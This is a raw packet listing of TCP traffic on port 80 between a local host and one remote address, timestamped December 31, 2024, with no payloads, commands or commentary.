Dec 31, 2024 09:48:42.226942062 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.226953030 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.226972103 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.226982117 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.227031946 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.227042913 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.227052927 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.227078915 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.227147102 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.227181911 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.227202892 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.227267027 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.227277040 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.227287054 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.227298021 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.227305889 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.227323055 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.227351904 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.227363110 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.227380991 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.227390051 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.227400064 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.227401018 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.227413893 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.227433920 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.227485895 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.227495909 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.227507114 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.227515936 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.227525949 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.227525949 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.227535009 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.227556944 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.227577925 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.227588892 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.227597952 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.227629900 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.227638960 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.227698088 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.227709055 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.227719069 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.227746010 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.227758884 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.227768898 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.227797031 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.227799892 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.227807999 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.227832079 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.227837086 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.227842093 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.227852106 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.227860928 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.227864027 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.227891922 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.227916002 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.227926016 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.227936029 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.227946997 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.227962971 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.227967978 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.227972984 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.227974892 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.227982998 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.227993965 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.228024006 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.228074074 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.228147984 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.228163004 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.228173018 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.228183031 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.228193045 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.228204012 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.228269100 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.228347063 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.228379011 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.228388071 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.228413105 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.228420019 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.228421926 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.228449106 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.228601933 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.228612900 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.228621960 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.228634119 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.228641987 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.228667021 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.229751110 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.229794979 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.229839087 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.229847908 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.229857922 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.229868889 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.229882002 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.229888916 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.229904890 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.229923964 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.229933977 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.229939938 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.229944944 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.229975939 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.230104923 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.230114937 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.230124950 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.230137110 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.230144978 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.230151892 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.230178118 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.230443954 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.230454922 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.230464935 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.230475903 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.230489016 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.230520964 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.230694056 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.230741978 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.230751038 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.230761051 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.230771065 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.230786085 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.230787039 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.230809927 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.230823040 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.231034040 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.231043100 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.231075048 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.231076002 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.231085062 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.231096983 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.231112003 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.231116056 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.231122017 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.231136084 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.231183052 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.231199980 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.231210947 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.231218100 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.231220007 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.231235027 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.231241941 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.231245041 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.231255054 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.231267929 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.231276989 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.231278896 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.231304884 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.231311083 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.231328011 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.231354952 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.231625080 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.231640100 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.231651068 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.231662035 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.231672049 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.231682062 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.231687069 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.231693029 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.231703043 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.231713057 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.231730938 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.351969004 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.351979017 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.352058887 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.352163076 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.352179050 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.352190018 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.352199078 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.352210045 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.352224112 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.352260113 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.352480888 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.352492094 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.352503061 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.352519035 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.352525949 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.352535963 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.352538109 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.352546930 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.352556944 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.352596045 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.352607012 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.352617979 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.352643967 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.352644920 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.352654934 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.352665901 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.352677107 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.352686882 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.352694035 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.352719069 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.352864981 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.352880955 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.352891922 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.352901936 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.352917910 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.352920055 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.352942944 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.352953911 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.352956057 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.352963924 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.352974892 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.352986097 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.352994919 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.352996111 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.353018999 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.353024960 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.353033066 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.353074074 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.353084087 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.353086948 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.353089094 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.353132963 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.353177071 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.353188038 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.353193045 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.353216887 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.353226900 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.353230000 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.353254080 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.353264093 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.353274107 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.353277922 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.353300095 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.353318930 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.353337049 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.353348970 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.353359938 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.353369951 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.353389978 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.353414059 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.353458881 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.353470087 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.353481054 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.353488922 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.353502035 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.353526115 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.353624105 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.353634119 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.353643894 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.353657961 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.353666067 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.353667974 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.353678942 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.353698015 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.353722095 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.353878975 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.353889942 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.353899956 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.353920937 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.355036974 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.355053902 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.355063915 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.355073929 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.355083942 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.355093002 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.355120897 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.355180025 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.355189085 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.355200052 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.355217934 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.355226994 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.355232000 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.355259895 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.355343103 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.355353117 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.355364084 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.355380058 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.355381966 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.355390072 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.355403900 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.355431080 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.355448961 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.355459929 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.355469942 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.355487108 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.355758905 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.355788946 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.355823040 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.355864048 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.355874062 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.355891943 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.355901003 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.355906010 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.355911016 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.355916023 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.355942965 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.356138945 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.356156111 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.356165886 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.356184959 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.356189966 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.356220007 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.356364012 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.356391907 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.356403112 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.356431007 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.356436968 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.356446981 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.356481075 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.356525898 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.356534958 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.356547117 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.356558084 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.356566906 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.356568098 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.356581926 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.356604099 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.357464075 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.357475042 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.357485056 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.357496023 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.357508898 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.357527971 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.357551098 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.357566118 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.357575893 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.357585907 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.357595921 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.357604980 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.357608080 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.357634068 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.477530003 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.477551937 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.477562904 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.477602959 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.477607965 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.477613926 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.477623940 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.477642059 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.477642059 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.477653980 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.477654934 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.477664948 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.477679968 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.477684975 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.477695942 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.477726936 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.477746964 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.477756977 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.477766991 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.477777958 CET	80	49754	185.215.113.16	192.168.2.6
